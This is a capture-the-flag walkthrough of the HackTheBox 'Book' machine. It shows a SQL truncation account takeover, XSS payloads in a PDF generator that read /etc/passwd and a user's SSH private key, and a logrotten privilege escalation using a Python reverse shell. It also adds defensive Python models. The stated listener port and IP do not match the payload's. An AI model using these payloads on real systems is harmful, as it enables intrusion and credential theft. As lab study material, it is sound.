2020-04-15
HTB::Book Walkthrough
0x01 Info Card
nmap
dirb
pspy
SQL Truncate
XSS LFI
logrotate exp
0x03 Pentesting
Initial Enumeration
Port scan
```text
# Nmap 7.80 scan initiated Fri Apr 3 22:48:24 2020 as: nmap -sC -sV -Pn -oN ippsec_scan.txt 10.10.10.176
Nmap scan report for 10.10.10.176
Host is up (0.43s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 f7:fc:57:99:f6:82:e0:03:d6:03:bc:09:43:01:55:b7 (RSA)
|   256 a3:e5:d1:74:c4:8a:e8:c8:52:c7:17:83:4a:54:31:bd (ECDSA)
|_  256 e3:62:68:72:e2:c0:ae:46:67:3d:cb:46:bf:69:b9:6a (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: LIBRARY - Read | Learn | Have Fun
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Apr 3 22:49:38 2020 -- 1 IP address (1 host up) scanned in 73.80 seconds
```
Directory scan
```text
$ dirb http://10.10.10.176

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Tue Apr 14 02:23:14 2020
URL_BASE: http://10.10.10.176/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.176/ ----
==> DIRECTORY: http://10.10.10.176/admin/
==> DIRECTORY: http://10.10.10.176/docs/
==> DIRECTORY: http://10.10.10.176/images/
+ http://10.10.10.176/index.php (CODE:200|SIZE:6800)
+ http://10.10.10.176/server-status (CODE:403|SIZE:277)

---- Entering directory: http://10.10.10.176/admin/ ----
==> DIRECTORY: http://10.10.10.176/admin/export/
+ http://10.10.10.176/admin/index.php (CODE:200|SIZE:6291)
==> DIRECTORY: http://10.10.10.176/admin/vendor/

---- Entering directory: http://10.10.10.176/docs/ ----

---- Entering directory: http://10.10.10.176/images/ ----

---- Entering directory: http://10.10.10.176/admin/export/ ----

---- Entering directory: http://10.10.10.176/admin/vendor/ ----
==> DIRECTORY: http://10.10.10.176/admin/vendor/composer/

---- Entering directory: http://10.10.10.176/admin/vendor/composer/ ----

-----------------
END_TIME: Tue Apr 14 04:45:39 2020
DOWNLOADED: 32284 - FOUND: 4
```
Getting User Access
Port 80 serves a site with a login and a registration page. Register and log in normally first, then look around; three things stand out:
- The Contact Us page reveals an administrator account, admin@book.htb
- The View Profile page shows that the current account's role is User
- The Collections page has an upload feature
First, try for vertical privilege escalation: register an account using admin@book.htb and intercept the request with Burp.
```http
POST /index.php HTTP/1.1
Host: 10.10.10.176
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.176/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Connection: close
Cookie: PHPSESSID=mq1sob5pmstq0i55csvmlafcre
Upgrade-Insecure-Requests: 1

name=admin&email=admin@book.htb&password=123321
```
The registration page source also shows that the email field is validated only in JavaScript:
```js
function validateForm() {
  var x = document.forms["myForm"]["name"].value;
  var y = document.forms["myForm"]["email"].value;
  if (x == "") {
    alert("Please fill name field. Should not be more than 10 characters");
    return false;
  }
  if (y == "") {
    alert("Please fill email field. Should not be more than 20 characters");
    return false;
  }
}
```
The trick here: after admin@book.htb, pad with spaces up to 20 characters and then append one arbitrary character, 21 characters in total.
```text
name=admin&email=admin@book.htb      C&password=123321
```
After the registration succeeds, logging into the site with admin@book.htb still shows the role as User. Switching to http://10.10.10.176/admin and logging in there just returns "Nope". A likely reason is that the name field is duplicated, so run the registration flow once more:
```text
name=admin2&email=admin@book.htb      C&password=123321
```
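As an added illustration of why the 21-character address works, and of the server-side fix, here is a small model of the registration and login logic (not the box's code or the walkthrough's). It assumes the email is stored in a VARCHAR(20) column, the database runs in a non-strict mode that silently truncates, and the column collation is PAD SPACE, so trailing spaces are ignored by `=`.

```python
# Added model of the registration bug above (not the box's code). Assumes email is a VARCHAR(20)
# column, a non-strict SQL mode that truncates silently, and a PAD SPACE collation (trailing
# spaces ignored by '='). Plaintext passwords are only to keep the model short.
EMAIL_COL_LEN = 20   # assumption, from the JS hint "not more than 20 characters"

def pad_space_equal(a, b):
    """MySQL PAD SPACE comparison: trailing spaces are insignificant."""
    return a.rstrip(" ") == b.rstrip(" ")

class VulnerableUsers:
    def __init__(self, rows):
        self.rows = list(rows)

    def register(self, name, email, password):
        # Duplicate check sees the raw 21-char input, so the trailing 'C' makes it look new...
        if any(pad_space_equal(r["email"], email) for r in self.rows):
            return False
        # ...and the non-strict INSERT then truncates it to the column width.
        self.rows.append({"name": name, "email": email[:EMAIL_COL_LEN], "password": password})
        return True

    def login(self, email, password):
        # WHERE email = ? AND password = ?  -- the collation ignores the padding
        for r in self.rows:
            if pad_space_equal(r["email"], email) and r["password"] == password:
                return r["name"]
        return None

class HardenedUsers(VulnerableUsers):
    def register(self, name, email, password):
        email = email.strip().lower()
        # Enforce length server-side; in MySQL also set sql_mode=STRICT_TRANS_TABLES and
        # a UNIQUE index on email so the database rejects what the application misses.
        if len(email) > EMAIL_COL_LEN or len(name) > 10:
            return False
        if any(r["email"] == email for r in self.rows):
            return False
        self.rows.append({"name": name, "email": email, "password": password})
        return True

    def login(self, email, password):
        email = email.strip().lower()
        for r in self.rows:
            if r["email"] == email and r["password"] == password:   # exact match only
                return r["name"]
        return None

# Constructed seed row and the walkthrough's 21-character address (14 chars + 6 spaces + 'C').
ADMIN_ROW = {"name": "admin", "email": "admin@book.htb", "password": "constructed-admin-secret"}
ATTACK_EMAIL = "admin@book.htb" + " " * 6 + "C"
```

In the vulnerable model the second row is stored as the 20-character padded address, so a lookup for `admin@book.htb` with the new password matches it; the hardened model rejects the input before it reaches the table.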
This time the admin site login succeeds. Next, try the Collections module: upload a PDF from the user side, with arbitrary content.
Downloading the Collections PDF from the admin panel shows the file that was just uploaded.
Putting the logic together: data we supply is rendered into the PDF, so local files can be read via XSS in the PDF generator. A search for "LFI XSS" turns up Noob-ninja's write-up of the technique: https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html
payload:
```html
<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///etc/passwd");x.send();</script>
```
After uploading it, download the Collections PDF from the admin panel again.
This yields a username, reader; next, fetch the SSH key from that user's home directory.
payload:
```html
<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///home/reader/.ssh/id_rsa");x.send();</script>
```
The PDF does not render properly, though, so convert it to text with pdfminer.six: https://github.com/pdfminer/pdfminer.six
```bash
$ python3 tools/pdf2text.py 68498.pdf > id_rsa
```
SSH reader login
```text
$ ssh -i id_rsa.txt reader@book.htb
The authenticity of host 'book.htb (10.10.10.176)' can't be established.
ECDSA key fingerprint is SHA256:QRw8pCXg7E8d9sWI+0Z9nZxClJiq9/eAeT/9wUfoQQk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'book.htb' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 5.4.1-050401-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon Mar  2 15:30:16 UTC 2020

  System load:  0.28               Processes:            194
  Usage of /:   27.1% of 19.56GB   Users logged in:      1
  Memory usage: 39%                IP address for ens33: 10.10.10.176
  Swap usage:   0%

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

114 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Tue Apr 14 06:05:21 2020 from 10.10.17.235
reader@book:~$ id
uid=1000(reader) gid=1000(reader) groups=1000(reader)
reader@book:~$ ls
backups  lse.sh  user.txt
```
Getting Root Access
The home directory contains a backups folder:
```text
reader@book:~$ cd backups/
reader@book:~/backups$ ls -la
total 12
drwxr-xr-x 2 reader reader 4096 Jan 29 13:05 .
drwxr-xr-x 7 reader reader 4096 Jan 29 13:05 ..
-rw-r--r-- 1 reader reader    0 Jan 29 13:05 access.log
-rw-r--r-- 1 reader reader   91 Jan 29 13:05 access.log.1
reader@book:~/backups$ cat access.log.1
192.168.0.104 - - [29/Jun/2019:14:39:55 +0000] "GET /robbie03 HTTP/1.1" 404 446 "-" "curl"
```
Monitor the processes running on the target with pspy:
```text
2020/04/14 10:17:39 CMD: UID=0    PID=78202  | sleep 5
2020/04/14 10:17:44 CMD: UID=0    PID=78205  | /usr/sbin/logrotate -f /root/log.cfg
2020/04/14 10:17:44 CMD: UID=0    PID=78204  | /bin/sh /root/log.sh
2020/04/14 10:17:44 CMD: UID=0    PID=78206  | sleep 5
```
If logrotate runs as root and an unprivileged user has write access to a log file that logrotate rotates, there is a known exploit that escalates privileges. First confirm that access.log really is being rotated by writing 10M of random data into it:
```text
reader@book:~/backups$ head -c 10M < /dev/urandom > access.log
reader@book:~/backups$ ls -la
total 10252
drwxr-xr-x 2 reader reader     4096 Jan 29 13:05 .
drwxr-xr-x 7 reader reader     4096 Jan 29 13:05 ..
-rw-r--r-- 1 reader reader 10485760 Apr 15 02:35 access.log
-rw-r--r-- 1 reader reader       91 Jan 29 13:05 access.log.1
reader@book:~/backups$ ls -la
total 10252
drwxr-xr-x 2 reader reader     4096 Apr 15 02:35 .
drwxr-xr-x 7 reader reader     4096 Jan 29 13:05 ..
-rw-r--r-- 1 reader reader        0 Apr 15 02:35 access.log
-rw-r--r-- 1 reader reader 10485760 Apr 15 02:35 access.log.1
-rw-r--r-- 1 reader reader       91 Jan 29 13:05 access.log.2
```
Clearly a new access.log.2 log file has appeared, so the file is rotated.
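The condition stated above (root running logrotate over a log that lives in a directory the unprivileged user owns) is something a defender can audit from the logrotate configuration itself. The following checker is an added example, not part of the walkthrough or of logrotten; the config and the ownership table are constructed stand-ins for the box's real /root/log.cfg and filesystem, and a block with an `su user group` directive is treated as mitigated because logrotate then rotates that block as the named user rather than as root.

```python
import os
import stat

# Constructed logrotate config modelled on the page's rotated log; not the box's real /root/log.cfg.
SAMPLE_CONFIG = """
/home/reader/backups/access.log {
    rotate 3
    create
}
/var/log/syslog {
    rotate 4
    create 0640 syslog adm
}
"""

# Constructed ownership table standing in for os.stat(): path -> (st_uid, st_mode)
SAMPLE_STAT = {
    "/home/reader/backups": (1000, stat.S_IFDIR | 0o755),   # owned by the unprivileged user
    "/var/log": (0, stat.S_IFDIR | 0o755),                  # root-owned, not group/world writable
}

def parse_blocks(config_text):
    """Yield (paths, directives) for each 'path... { ... }' block in a logrotate config."""
    paths, directives, inside = [], [], False
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if not inside:
            if line.endswith("{"):          # global directives outside blocks are skipped
                paths, directives, inside = line[:-1].split(), [], True
        elif line == "}":
            yield paths, directives
            inside = False
        else:
            directives.append(line.split())

def audit(config_text, stat_fn=lambda p: (os.stat(p).st_uid, os.stat(p).st_mode)):
    """Flag logs that root will rename/recreate inside a directory a non-root user can write to."""
    findings = []
    for paths, directives in parse_blocks(config_text):
        if any(d[0] == "su" for d in directives):   # block rotates as that user, not as root
            continue
        for path in paths:
            parent = os.path.dirname(path)
            uid, mode = stat_fn(parent)
            if uid != 0 or mode & 0o022:
                findings.append((path, f"{parent} writable by non-root (uid={uid}, mode={oct(mode & 0o777)})"))
    return findings
```

Run `audit(open("/etc/logrotate.conf").read())` on a real host to use the live `os.stat` data; the fix for a flagged entry is to move the log under a root-owned directory or add `su` to its block.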
Download the logrotate exploit from https://github.com/whotwagner/logrotten to the local machine, upload it to the target's home directory and compile it:
```bash
reader@book:~$ gcc -o logrotten logrotten.c
```
Then prepare a payloadfile containing a reverse shell, and start a listener on port 4444 on the local machine:
```bash
reader@book:~$ cat payloadfile
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.55",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```
Then run the exploit:
```bash
reader@book:~$ ./logrotten -p ./payloadfile /home/reader/backups/access.log
Waiting for rotating backups/access.log...
```
At the same time, log into the target from another terminal, write random data into the rotated log, and watch the listener on the local machine:
```text
$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.15.152] from (UNKNOWN) [10.10.10.176] 50008
# cat /root/root.txt
84da9--------------------0dd89714
```
0x04 Reference
https://github.com/whotwagner/logrotten
https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf
https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html